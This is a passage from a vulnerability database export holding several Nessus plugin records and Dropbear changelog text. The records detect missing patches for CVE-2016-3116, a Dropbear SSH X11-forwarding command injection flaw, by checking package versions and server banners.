dropbearkey or dropbearconvert to libz or\n libutil, thanks to Nicolas Boos\n\n - Fix linking -lcrypt on systems without /usr/lib, thanks\n to Nicolas Boos\n\n - Avoid crash on exit due to cleaned up keys before last\n packets are sent, debugged by Ronald Wahl\n\n - Fix a race condition in rekeying where Dropbear would\n exit if it received a still-in-flight packet after\n initiating rekeying. Reported by Oliver Metz. This is a\n longstanding bug but is triggered more easily since\n 2013.57\n\n - [...]\n\n - dropbear was updated service files and activated\n building of ecdsa keys\n\n - only package the old init service in distributions\n without systemd\n\n - imported upstream version 2013.62\n\n - Disable 'interactive' QoS connection options when a\n connection doesn't have a PTY (eg scp, rsync). Thanks to\n Catalin Patulea for the patch.\n\n - Log when a hostkey is generated with -R, fix some bugs\n in handling server hostkey commandline options\n\n - Fix crash in Dropbearconvert and 521 bit key, reported\n by NiLuJe\n\n - Update config.guess and config.sub again\n\n - ECC (elliptic curve) support. Supports ECDSA hostkeys\n (requires new keys to be generated) and ECDH for setting\n up encryption keys (no intervention required). This is\n significantly faster.\n\n - curve25519-sha256@libssh.org support for setting up\n encryption keys. This is another elliptic curve mode\n with less potential of NSA interference in algorithm\n parameters. curve25519-donna code thanks to Adam Langley\n\n - -R option to automatically generate hostkeys. This is\n recommended for embedded platforms since it allows the\n system random number device /dev/urandom a longer\n startup time to generate a secure seed before the\n hostkey is required.\n\n - Compile fixes for old vendor compilers like Tru64 from\n Daniel Richard G.\n\n - Make authorized_keys handling more robust, don't exit\n encountering malformed lines. Thanks to Lorin Hochstein\n and Mark Stillwell", "edition": 19, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-25T00:00:00", "title": "openSUSE Security Update : dropbear (openSUSE-2016-393)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-25T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:dropbear-debugsource", "p-cpe:/a:novell:opensuse:dropbear", "p-cpe:/a:novell:opensuse:dropbear-debuginfo", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2016-393.NASL", "href": "https://www.tenable.com/plugins/nessus/90168", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-393.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90168);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-3116\");\n\n script_name(english:\"openSUSE Security Update : dropbear (openSUSE-2016-393)\");\n script_summary(english:\"Check for the openSUSE-2016-393 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for dropbear fixes the following issues :\n\n - dropbear was updated to upstream version 2016.72\n\n - Validate X11 forwarding input. Could allow bypass of\n authorized_keys command= restrictions, found by\n github.com/tintinweb. Thanks for Damien Miller for a\n patch.\n\n - used as bug fix release for boo#970633 - CVE-2016-3116\n\n - dropbear was updated to upstream version 2015.71\n\n - Fix 'bad buf_incrpos' when data is transferred, broke in\n 2015.69\n\n - Fix crash on exit when -p address:port is used, broke in\n 2015.68\n\n - Fix building with only ENABLE_CLI_REMOTETCPFWD given,\n patch from Konstantin Tokarev\n\n - Fix bad configure script test which didn't work with\n dash shell, patch from Juergen Daubert, broke in 2015.70\n\n - Fix server race condition that could cause sessions to\n hang on exit,\n https://github.com/robotframework/SSHLibrary/issues/128\n\n - dropbear was updated to upstream version 2015.70\n\n - Fix server password authentication on Linux, broke in\n 2015.69\n\n - Fix crash when forwarded TCP connections fail to connect\n (bug introduced in 2015.68)\n\n - Avoid hang on session close when multiple sessions are\n started, affects Qt Creator Patch from Andrzej\n Szombierski\n\n - Reduce per-channel memory consumption in common case,\n increase default channel limit from 100 to 1000 which\n should improve SOCKS forwarding for modern webpages\n\n - Handle multiple command line arguments in a single flag,\n thanks to Guilhem Moulin\n\n - Manpage improvements from Guilhem Moulin\n\n - Build fixes for Android from Mike Frysinger\n\n - Don't display the MOTD when an explicit command is run\n from Guilhem Moulin\n\n - Check curve25519 shared secret isn't zero\n\n - dropbear was updated to upstream version 2015.68\n\n - Reduce local data copying for improved efficiency.\n Measured 30% increase in throughput for connections to\n localhost\n\n - Forwarded TCP ports connect asynchronously and try all\n available addresses (IPv4, IPv6, round robin DNS)\n\n - Fix all compile warnings, many patches from Gaël\n Portay Note that configure with -Werror may not be\n successful on some platforms (OS X) and some\n configuration options may still result in unused\n variable warnings.\n\n - Use TCP Fast Open on Linux if available. Saves a round\n trip at connection to hosts that have previously been\n connected. Needs a recent Linux kernel and possibly\n 'sysctl -w net.ipv4.tcp_fastopen=3' Client side is\n disabled by default pending further compatibility\n testing with networks and systems.\n\n - Increase maximum command length to 9000 bytes\n\n - Free memory before exiting, patch from Thorsten\n Horstmann. Useful for Dropbear ports to embedded systems\n and for checking memory leaks with valgrind. Only\n partially implemented for dbclient. This is disabled by\n default, enable with DROPBEAR_CLEANUP in sysoptions.h\n\n - DROPBEAR_DEFAULT_CLI_AUTHKEY setting now always prepends\n home directory unless there is a leading slash (~ isn't\n treated specially)\n\n - Fix small ECC memory leaks\n\n - Tighten validation of Diffie-Hellman parameters, from\n Florent Daigniere of Matta Consulting. Odds of bad\n values are around 2**-512 -- improbable.\n\n - Twofish-ctr cipher is supported though disabled by\n default\n\n - Fix pre-authentication timeout when waiting for client\n SSH-2.0 banner, thanks to CL Ouyang\n\n - Fix NULL pointer crash with restrictions in\n authorized_keys without a command, patch from Guilhem\n Moulin\n\n - Ensure authentication timeout is handled while reading\n the initial banner, thanks to CL Ouyang for finding it.\n\n - Fix NULL pointer crash when handling bad ECC keys. Found\n by afl-fuzz\n\n - dropbear was updated to upstream version 2015.67\n\n - Call fsync() after generating private keys to ensure\n they aren't lost if a reboot occurs. Thanks to Peter\n Korsgaard\n\n - Disable non-delayed zlib compression by default on the\n server. Can be enabled if required for old clients with\n DROPBEAR_SERVER_DELAY_ZLIB\n\n - Default client key path ~/.ssh/id_dropbear\n\n - Prefer stronger algorithms by default, from Fedor\n Brunner. AES256 over 3DES Diffie-hellman group14 over\n group1\n\n - Add option to disable CBC ciphers.\n\n - Disable twofish in default options.h\n\n - Enable sha2 HMAC algorithms by default, the code was\n already required for ECC key exchange. sha1 is the first\n preference still for performance. \n\n - Fix installing dropbear.8 in a separate build directory,\n from Like Ma\n\n - Allow configure to succeed if libtomcrypt/libtommath are\n missing, from Elan Ruusamäe\n\n - Don't crash if ssh-agent provides an unknown type of\n key. From Catalin Patulea\n\n - Minor bug fixes, a few issues found by Coverity scan \n\n - dropbear was updated to upstream version 2014.66\n\n - Use the same keepalive handling behaviour as OpenSSH.\n This will work better with some SSH implementations that\n have different behaviour with unknown message types.\n\n - Don't reply with SSH_MSG_UNIMPLEMENTED when we receive a\n reply to our own keepalive message\n\n - Set $SSH_CLIENT to keep bash happy, patch from Ryan\n Cleere\n\n - Fix wtmp which broke since 2013.62, patch from Whoopie\n\n - dropbear was updated to upstream version 2014.65\n\n - Fix 2014.64 regression, server session hang on exit with\n scp (and probably others), thanks to NiLuJe for tracking\n it down\n\n - Fix 2014.64 regression, clock_gettime() error handling\n which broke on older Linux kernels, reported by NiLuJe\n\n - Fix 2014.64 regression, writev() could occassionally\n fail with EAGAIN which wasn't caught\n\n - Avoid error message when trying to set QoS on\n proxycommand or multihop pipes\n\n - Use /usr/bin/xauth, thanks to Mike Frysinger\n\n - Don't exit the client if the local user entry can't be\n found, thanks to iquaba\n\n - added missing systemd entries for\n dropbear-keygen.service\n\n - dropbear was updated to upstream version 2014.64\n\n - Fix compiling with ECDSA and DSS disabled\n\n - Don't exit abruptly if too many outgoing packets are\n queued for writev(). Patch thanks to Ronny Meeus\n\n - The -K keepalive option now behaves more like OpenSSH's\n 'ServerAliveInterval'. If no response is received after\n 3 keepalives then the session is terminated. This will\n close connections faster than waiting for a TCP timeout.\n\n - Rework TCP priority setting. New settings are if\n (connecting || ptys || x11) tos = LOWDELAY else if\n (tcp_forwards) tos = 0 else tos = BULK Thanks to Catalin\n Patulea for the suggestion.\n\n - Improve handling of many concurrent new TCP forwarded\n connections, should now be able to handle as many as\n MAX_CHANNELS. Thanks to Eduardo Silva for reporting and\n investigating it.\n\n - Make sure that exit messages from the client are\n printed, regression in 2013.57\n\n - Use monotonic clock where available, timeouts won't be\n affected by system time changes\n\n - Add -V for version\n\n - dropbear was updated regular init script to also create\n ECDSA keys\n\n - update to upstream version 2014.63\n\n - Fix ~. to terminate a client interactive session after\n waking a laptop from sleep.\n\n - Changed port separator syntax again, now using\n host^port. This is because IPv6 link-local addresses use\n %. Reported by Gui Iribarren\n\n - Avoid constantly relinking dropbearmulti target, fix\n 'make install' for multi target, thanks to Mike\n Frysinger\n\n - Avoid getting stuck in a loop writing huge key files,\n reported by Bruno Thomsen\n\n - Don't link dropbearkey or dropbearconvert to libz or\n libutil, thanks to Nicolas Boos\n\n - Fix linking -lcrypt on systems without /usr/lib, thanks\n to Nicolas Boos\n\n - Avoid crash on exit due to cleaned up keys before last\n packets are sent, debugged by Ronald Wahl\n\n - Fix a race condition in rekeying where Dropbear would\n exit if it received a still-in-flight packet after\n initiating rekeying. Reported by Oliver Metz. This is a\n longstanding bug but is triggered more easily since\n 2013.57\n\n - [...]\n\n - dropbear was updated service files and activated\n building of ecdsa keys\n\n - only package the old init service in distributions\n without systemd\n\n - imported upstream version 2013.62\n\n - Disable 'interactive' QoS connection options when a\n connection doesn't have a PTY (eg scp, rsync). Thanks to\n Catalin Patulea for the patch.\n\n - Log when a hostkey is generated with -R, fix some bugs\n in handling server hostkey commandline options\n\n - Fix crash in Dropbearconvert and 521 bit key, reported\n by NiLuJe\n\n - Update config.guess and config.sub again\n\n - ECC (elliptic curve) support. Supports ECDSA hostkeys\n (requires new keys to be generated) and ECDH for setting\n up encryption keys (no intervention required). This is\n significantly faster.\n\n - curve25519-sha256@libssh.org support for setting up\n encryption keys. This is another elliptic curve mode\n with less potential of NSA interference in algorithm\n parameters. curve25519-donna code thanks to Adam Langley\n\n - -R option to automatically generate hostkeys. This is\n recommended for embedded platforms since it allows the\n system random number device /dev/urandom a longer\n startup time to generate a secure seed before the\n hostkey is required.\n\n - Compile fixes for old vendor compilers like Tru64 from\n Daniel Richard G.\n\n - Make authorized_keys handling more robust, don't exit\n encountering malformed lines. Thanks to Lorin Hochstein\n and Mark Stillwell\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/robotframework/SSHLibrary/issues/128\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dropbear packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dropbear-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dropbear-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"dropbear-2016.72-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"dropbear-debuginfo-2016.72-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"dropbear-debugsource-2016.72-2.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dropbear / dropbear-debuginfo / dropbear-debugsource\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-06T10:55:09", "description": "Matt Johnson reports :\n\nValidate X11 forwarding input. Could allow bypass of authorized_keys\ncommand= restrictions", "edition": 25, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-15T00:00:00", "title": "FreeBSD : dropbear -- authorized_keys command= bypass (8eb78cdc-e9ec-11e5-85be-14dae9d210b8)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-15T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:dropbear"], "id": "FREEBSD_PKG_8EB78CDCE9EC11E585BE14DAE9D210B8.NASL", "href": "https://www.tenable.com/plugins/nessus/89928", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89928);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-3116\");\n\n script_name(english:\"FreeBSD : dropbear -- authorized_keys command= bypass (8eb78cdc-e9ec-11e5-85be-14dae9d210b8)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Matt Johnson reports :\n\nValidate X11 forwarding input. Could allow bypass of authorized_keys\ncommand= restrictions\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://matt.ucc.asn.au/dropbear/CHANGES\"\n );\n # https://vuxml.freebsd.org/freebsd/8eb78cdc-e9ec-11e5-85be-14dae9d210b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?44a85a33\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"dropbear<2016.72\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T11:05:16", "description": "The remote host is affected by the vulnerability described in GLSA-201607-08\n(Dropbear: Privilege escalation)\n\n A CRLF injection vulnerability in Dropbear SSH allows remote\n authenticated users to bypass intended shell-command restrictions via\n crafted X11 forwarding data.\n \nImpact :\n\n A remote authenticated user could execute arbitrary code with the\n privileges of the process.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-07-21T00:00:00", "title": "GLSA-201607-08 : Dropbear: Privilege escalation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-07-21T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:dropbear"], "id": "GENTOO_GLSA-201607-08.NASL", "href": "https://www.tenable.com/plugins/nessus/92478", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201607-08.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92478);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3116\");\n script_xref(name:\"GLSA\", value:\"201607-08\");\n\n script_name(english:\"GLSA-201607-08 : Dropbear: Privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201607-08\n(Dropbear: Privilege escalation)\n\n A CRLF injection vulnerability in Dropbear SSH allows remote\n authenticated users to bypass intended shell-command restrictions via\n crafted X11 forwarding data.\n \nImpact :\n\n A remote authenticated user could execute arbitrary code with the\n privileges of the process.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201607-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Dropbear users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/dropbear-2016.73'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/dropbear\", unaffected:make_list(\"ge 2016.73\"), vulnerable:make_list(\"lt 2016.73\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Dropbear\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-03-01T02:07:18", "description": "According to its self-reported version in the banner, the version of\nDropbear SSH running on the remote host is prior to 2016.72. It is,\ntherefore, affected by a command injection vulnerability when X11\nForwarding is enabled, due to improper sanitization of X11\nauthentication credentials. An authenticated, remote attacker can\nexploit this to execute arbitrary xauth commands on the remote host.\n\nNote that X11 Forwarding is not enabled by default.", "edition": 28, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-18T00:00:00", "title": "Dropbear SSH Server < 2016.72 xauth Command Injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:matt_johnston:dropbear_ssh_server"], "id": "DROPBEAR_SSH_72.NASL", "href": "https://www.tenable.com/plugins/nessus/90027", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90027);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\"CVE-2016-3116\");\n\n script_name(english:\"Dropbear SSH Server < 2016.72 xauth Command Injection\");\n script_summary(english:\"Checks remote SSH server type and version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SSH service is affected by a command injection\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version in the banner, the version of\nDropbear SSH running on the remote host is prior to 2016.72. It is,\ntherefore, affected by a command injection vulnerability when X11\nForwarding is enabled, due to improper sanitization of X11\nauthentication credentials. An authenticated, remote attacker can\nexploit this to execute arbitrary xauth commands on the remote host.\n\nNote that X11 Forwarding is not enabled by default.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://matt.ucc.asn.au/dropbear/CHANGES\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2016/Mar/47\");\n # https://github.com/mkj/dropbear/commit/18681875e30e1ea251914417829fdbb50534c9ba\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1e20657\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dropbear SSH version 2016.72 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3116\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/18\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:matt_johnston:dropbear_ssh_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"backport.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"Dropbear SSH\";\nport = get_service(svc:\"ssh\", exit_on_fail:TRUE);\n\norig_banner = get_kb_item_or_exit(\"SSH/banner/\" + port);\nbanner = get_backport_banner(banner:orig_banner);\n\n# Make sure it's Dropbear.\nif (\"dropbear\" >!< banner) audit(AUDIT_NOT_DETECT, \"Dropbear SSH\", port);\n\nif (backported) audit(AUDIT_BACKPORT_SERVICE, port, \"Dropbear SSH\");\n\nitem = eregmatch(pattern:\"dropbear_([0-9]+\\.[0-9]+(\\.[0-9]+)?)($|[^0-9])\", string:banner);\nif (isnull(item)) audit(AUDIT_SERVICE_VER_FAIL, 